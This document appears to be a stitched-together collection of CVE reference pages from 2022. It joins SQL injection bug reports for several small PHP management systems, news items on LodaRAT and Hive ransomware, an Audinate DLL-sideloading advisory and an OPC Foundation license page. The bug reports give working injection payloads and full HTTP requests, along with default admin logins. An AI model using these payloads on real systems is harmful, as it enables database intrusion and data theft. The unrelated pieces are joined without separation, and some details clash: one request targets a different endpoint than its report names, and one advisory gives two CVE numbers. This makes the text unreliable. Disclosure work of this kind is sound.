Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/services/manage_service.php?id=.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: huchengrong

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/services/manage\_service.php?id=

Vulnerability location: /asms/admin/services/manage\_service.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/services/manage\_service.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/services/manage\_service.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44414: bug_report/SQLi-1.md at main · huchengrong/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL via /asms/classes/Master.php?f=delete_mechanic.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: suikirakira

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/classes/Master.php?f=delete\_mechanic

Vulnerability location: /asms/classes/Master.php?f=delete\_mechanic, id

dbname =asms\_db,length=7

\[+\] Payload: id=3 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /asms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=3 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44378: bug_report/SQLi-1.md at main · suikirakira/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_service.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: suikirakira

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/classes/Master.php?f=delete\_service

Vulnerability location: /asms/classes/Master.php?f=delete\_service, id

dbname =asms\_db,length=7

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /asms/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44379: bug_report/SQLi-2.md at main · suikirakira/bug_report

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 11 and Nov. 18. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for November 11 to 18

The LodaRAT malware has resurfaced with new variants that are being deployed in conjunction with other sophisticated malware, such as RedLine Stealer and Neshta.
"The ease of access to its source code makes LodaRAT an attractive tool for any threat actor who is interested in its capabilities," Cisco Talos researcher Chris Neal said in a write-up published Thursday.
Aside from being dropped

The LodaRAT malware has resurfaced with new variants that are being deployed in conjunction with other sophisticated malware, such as RedLine Stealer and Neshta.

"The ease of access to its source code makes LodaRAT an attractive tool for any threat actor who is interested in its capabilities," Cisco Talos researcher Chris Neal said in a write-up published Thursday.

Aside from being dropped alongside other malware families, LodaRAT has also been observed being delivered through a previously unknown variant of another commodity trojan called Venom RAT, which has been codenamed S500.

An AutoIT-based malware, LodaRAT (aka Nymeria) is attributed to a group called Kasablanca and is capable of harvesting sensitive information from compromised machines.

In February 2021, an Android version of the malware sprang forth as a way for the threat actors to expand their attack surface. Then in September 2022, Zscaler ThreatLabz uncovered a new delivery mechanism that involved the use of an information stealer dubbed Prynt Stealer.

The latest findings from Cisco Talos documents the altered variants of LodaRAT that have been detected in the wild with updated functionality, chiefly enabling it to proliferate to every attached removable storage device and detect running antivirus processes.

The revamped implementation is also considered ineffective in that it searches for an explicit list of 30 different process names associated with different cybersecurity vendors, meaning a solution that's not included in the search criteria will not be detected.

Also included in this list are discontinued security software such as Prevx, ByteHero, and Norman Virus Control, suggesting that this may be an attempt on the part of the threat actor to flag systems or virtual machines running older versions of Windows.

An analysis of the captured artifacts further reveals the removal of non-functional code and the use of string obfuscation using a more efficient method.

The bundling of LodaRAT alongside Neshta and RedLine Stealer has also been something of a puzzle, although it's being suspected that "LodaRAT is preferred by the attacker for performing a particular function."

"Over the course of LodaRAT's lifetime, the implant has gone through numerous changes and continues to evolve," the researchers said. "While some of these changes appear to be purely for an increase in speed and efficiency, or reduction in file size, some changes make Loda a more capable malware."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities

The threat actors behind the Hive ransomware-as-a-service (RaaS) scheme have launched attacks against over 1,300 companies across the world, netting the gang $100 million in illicit payments as of November 2022.
"Hive ransomware has targeted a wide range of businesses and critical infrastructure sectors, including government facilities, communications, critical manufacturing, information

The threat actors behind the Hive ransomware-as-a-service (RaaS) scheme have launched attacks against over 1,300 companies across the world, netting the gang $100 million in illicit payments as of November 2022.

"Hive ransomware has targeted a wide range of businesses and critical infrastructure sectors, including government facilities, communications, critical manufacturing, information technology, and — especially — Healthcare and Public Health (HPH)," U.S. cybersecurity and intelligence authorities said in an alert.

Active since June 2021, Hive's RaaS operation involves a mix of developers, who create and manage the malware, and affiliates, who are responsible for conducting the attacks on target networks by often purchasing initial access from initial access brokers (IABs).

In most cases, gaining a foothold involves the exploitation of ProxyShell flaws in Microsoft Exchange Server, followed by taking steps to terminate processes associated with antivirus engines and data backups as well as delete Windows event logs.

The threat actor, which recently upgraded its malware to Rust as a detection evasion measure, is also known to remove virus definitions prior to encryption.

"Hive actors have been known to reinfect—with either Hive ransomware or another ransomware variant—the networks of victim organizations who have restored their network without making a ransom payment," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said.

According to data shared by cybersecurity company Malwarebytes, Hive compromised about seven victims in August 2022, 14 in September, and two other entities in October, marking a drop in activity from July, when the group targeted 26 victims.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hive Ransomware Attackers Extorted $100 Million from Over 1,300 Companies Worldwide

mDNSResponder.exe is vulnerable to DLL Sideloading attack. Executable improperly specifies how to load the DLL, from which folder and under what conditions. In these scenarios, a malicious attacker could be using the valid and legitimate executable to load malicious files.

FAQs

**Affected Products / Versions:** Third-party products that utiliseDante Application Library for Windows v1.2.0 and earlier

**Publication Date:** 7 December 2022

**Summary:** 

A security vulnerability (CVE-2021-23748) in mDNSResponder.exe contained in Dante Application Library for Windows v1.2.0 and earlier has been published. 

**This vulnerability only affects products that utilise Dante Application Library for Windows and does not affect any other Dante hardware or software products that include mDNSResponder.exe.**

**Details:**

mDNSResponder.exe v1.3.1 and earlier is vulnerable to a DLL side loading attack. This executable is a component built specifically for Dante Application Library for Windows v1.2.0 and earlier

This could allow a local attacker with access to the PC running Dante Application Library the ability to execute arbitrary code. It is not possible to remotely exploit this vulnerability.

**Remediation:**

An updated mDNSResponder.exe  v1.3.2 has been released to all affected third parties as part of Dante Application Library for Windows v1.2.1; and as a standalone security patch for Dante Application Library for Windows v1.2.0 and earlier

If you believe you are running software that utilises Dante Application Library for Windows, please contact the third-party vendor for a software update.

**References:**

CVE-2022-23748 – https://nvd.nist.gov/vuln/detail/CVE-2022-23748

CAPEC-641 – https://capec.mitre.org/data/definitions/641.html

CWE-114 – https://cwe.mitre.org/data/definitions/114.html

CVE-2022-23748: Audinate Response to Dante Discovery (mDNSResponder.exe) Security Issue (CVE-2022-23748) | Audinate | FAQs

OPC Foundation Local Discovery Server (LDS) through 1.04.403.478 uses a hard-coded file path to a configuration file. This allows a normal user to create a malicious file that is loaded by LDS (running as a high-privilege user).

Title: Local Discovery Server (LDS) Description:

The Local Discovery Server (LDS) provides the necessary infrastructure to publicly expose the OPC UA Servers available on a given computer.

This download includes:

*   Windows based executable written in portable ANSI C
*   Revision history

Documentation can be found here.

**License**: OPC Redistributable Agreement of Use

*   Support
*   Roadmap
*   Tracking

**OPC Foundation membership** fees are used by the OPC Foundation for the continuous improvement of this application, which includes bug-fixes to the application and the Stack it uses, and adding new features as required by the continuous advancement of the OPC Specifications.

**Sample code/ Reference Implementations** are provided to OPC Foundation Members as-is for the primary purpose of demonstration and educational purposes. OPC Foundation Members may use the OPC Foundation deliverables for their Product development. (Members are not permitted to distribute OPC Foundation Source code (see OPC Foundation license agreement)

**Technical support** is provided in the form of sample code and synopsis documentation. The OPC Foundation will soon have a forum where the OPC Foundation members and community provide “support” for the advancement and adoption of OPC technology.

**Found a bug?** Please report any bugs to our Mantis system. Click the "Tracking" tab for a list of current work items. We welcome your bug-fixes and kindly ask you to submit them via Mantis.

**Have a Suggestion / Request for enhancement / New Features?** Please Join an OPC Foundation Member Working Group (details may be found here). You may also submit requests to the OPC Foundation email address of. All suggestions become the property of the OPC Foundation.

*   Linux version
*   Bug-fixes and enhancements as needed.

Access: Registered User

*   Downloads
*   Archives

Version

Status

Description

Date Posted  
(YYYY-MM-DD)

Download

1.04.405

Release

OPC UA Local Discovery Server MergeModule (ZIP/EXE)

2022-11-08

Icon

1.04.405

Release

OPC UA Local Discovery Server Installer (ZIP/EXE)

2022-11-08

Icon

Version

Status

Description

Date Posted  
(YYYY-MM-DD)

Download

1.04.403.476

Release

OPC UA Local Discovery Server Installer (ZIP/EXE)

2022-03-18

Icon

1.04.403.476

Release

OPC UA Local Discovery Server MergeModule (ZIP/EXE)

2022-03-18

Icon

1.03.401

Release

OPC UA Local Discovery Server (EXE/ZIP)

2019-06-18

Icon

1.03.401

Release

OPC UA Local Discovery Server MergeModule (MSM/ZIP)

2019-06-18

Icon

1.03.400

Release

OPC UA Local Discovery Server (MSI/ZIP)

2018-08-09

Icon

1.03.400

Release

OPC UA Local Discovery Server MergeModule (MSM/ZIP)

2018-08-09

Icon

Version 1.3, February 06, 2017, OPC Foundation

The terms and conditions of the Agreement apply to the Software Deliverables including without limitation any OPC Foundation:

*   updates,
*   supplements
*   Internet-based services, and
*   support services

for the Software Deliverables, unless OPC Foundation specifies that any other terms accompany such items, in which case the alternate terms specified by OPC Foundation would apply.

**BY USING THE SOURCE DELIVERABLES, YOU ACCEPT THE TERMS OF THIS AGREEMENT. IF YOU DO NOT ACCEPT THE TERMS OF THIS AGREEMENT, DO NOT USE THE SOFTWARE DELIVERABLES.**

If you comply with this Agreement, you have the rights below.

**1\. INSTALLATION AND USE RIGHTS.**

.  
You may install and use any number of copies of the Software Deliverables.

**2\. ADDITIONAL LICENSING REQUIREMENTS AND/OR USE RIGHTS.**

.  
Distributable Code. The Software Deliverables contain compiled code that you are permitted to distribute with programs you develop if you comply with the terms below.

1.  Right to Use and Distribute.

*   You may copy and distribute all files that are part of this Software Deliverables.
*   Third Party Distribution. You may permit distributors of your programs to copy and distribute the Software Deliverables as part of those programs.

3.  Distribution Requirements. For any Software Deliverables you distribute, you must:
4.  add significant primary functionality to it in your programs;
5.  require distributors and external end users to agree to terms that protect it at least as much as this Agreement;
6.  display your valid copyright notice on your programs; and
7.  indemnify, defend, and hold harmless the OPC Foundation from any claims, including attorneys’ fees, related to the distribution or use of your programs.
8.  Distribution Restrictions. You may not:

*   alter any copyright, trademark or patent notice in the Software Deliverables;
*   use the OPC Foundation’s trademarks in your programs’ names or in a way that suggests your programs come from or are endorsed by the OPC Foundation;
*   include Software Deliverables in malicious, deceptive or unlawful programs;
*   modify or distribute the source code of any Software Deliverables so that any part of it becomes subject to an Excluded License. An Excluded License is one that requires, as a condition of use, modification or distribution, that (1). the code be disclosed or distributed in source code form; or (2) permit or otherwise allow others to have the right to modify such Software Deliverables; or
*   create additional software components that directly link or directly load the Software Deliverables without accepting the corresponding source license for that Software Deliverable.

**3\. SCOPE OF LICENSE.**

The Software Deliverables are licensed, not sold. This Agreement only gives you some rights to use the Software Deliverables. The OPC Foundation reserves all other rights. Unless applicable law gives you more rights despite this limitation, you may use the software only as expressly permitted in this Agreement. In doing so, you must comply with any technical limitations in the Software Deliverables that only allow you to use it in certain ways. You may not:

*   disclose the results of any benchmark tests of the Software Deliverables to any third party without OPC Foundation’s prior written approval;
*   work around any technical limitations in the Software Deliverables;
*   reverse engineer, decompile or disassemble the Software Deliverables, except and only to the extent that applicable law expressly permits, despite this limitation;
*   make more copies of the Software Deliverables than specified in this Agreement or allowed by applicable law, despite this limitation;
*   publish the Software Deliverables for others to copy; or
*   rent, lease or lend the Software Deliverables.

**4\. BACKUP COPY.**

You may make one backup copy of the Software Deliverables. You may use such copy only to reinstall the Software.

**5\. DOCUMENTATION.**

Any person that has valid access to your computer or internal network may copy and use the documentation related to the Software Deliverables for your internal reference purposes.

**6\. EXPORT RESTRICTIONS.**

The Software Deliverables are subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the Software Deliverables. These laws include restrictions on destinations, end users and end use.

**7\. SUPPORT SERVICES.**

Because you accept the Software3 Deliverables from OPC Foundation “as is,” OPC Foundation may not provide support services for it.

**8\. ENTIRE AGREEMENT.**

This Agreement, and the terms for supplements, updates, Internet-based services and support services that you use, are the entire Agreement for the Software Deliverables and support services.

**10\. LEGAL EFFECT**

This Agreement describes certain legal rights. You may have other rights under the laws of your country. This Agreement does not change your rights under the laws of your country if the laws of your country do not permit it to do so.

**11\. DISCLAIMER OF WARRANTY.**

THE SOFTWARE DELIVERABLES ARE LICENSED “AS-IS.” YOU BEAR THE RISK OF USING THE SPECIFICATIONS. THE OPC FOUNDATION MAKES NO WARRANTY OF ANY KIND, EXPRESSED OR IMPLIED, WITH REGARD TO THE SOFTWARE DELIVERABLES, INCLUDING BUT NOT LIMITED TO ANY WARRANTY OF TITLE OR OWNERSHIP, IMPLIED WARRANTY OF MERCHANTABILITY, OR WARRANTY OF FITNESS FOR A PARTICULAR PURPOSE OR USE.YOU MAY HAVE ADDITIONAL CONSUMER RIGHTS UNDER YOUR LOCAL LAWS THAT THIS AGREEMENT CANNOT CHANGE. TO THE EXTENT PERMITTED UNDER YOUR LOCAL LAWS, THE OPC FOUNDATION EXCLUDES THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT.  
IN NO EVENT SHALL THE OPC FOUNDATION BE LIABLE FOR ERRORS CONTAINED IN THE SOURCE DELIVERABLES OR FOR DIRECT, INDIRECT, INCIDENTAL, SPECIAL, CONSEQUENTIAL, RELIANCE OR COVER DAMAGES, INCLUDING LOSS OF PROFITS, REVENUE, DATA, OR USE, INCURRED BY ANY USER OR ANY THIRD PARTY IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THE SOFTWARE DELIVERABLES, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE USING THE SOFTWARE DELIVERABLES IS BORNE BY YOU AND/OR THE USER.

CVE-2022-44725: Unified Architecture - OPC Foundation

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /admin/?page=user/manage_user&id=.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: SunQingYu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/?page=user/manage\_user&id=

Vulnerability location: /leave\_system/admin/?page=user/manage\_user&id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/?page=user/manage\_user&id=12%27%20and%20length(database())%20=9--+ // Leak place ---> id

GET /leave\_system/admin/?page\=user/manage\_user&id\=12%27%20and%20length(database())%20\=9\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-43179: bug_report/SQLi-1.md at main · debug601/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /clients/view_client.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Linwei

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/clients/view\_client.php?id=

Vulnerability location: /odlms/admin/clients/view\_client.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/clients/view\_client.php?id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15--+ // Leak place ---> id

GET /odlms/admin/clients/view\_client.php?id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

Tag

#windows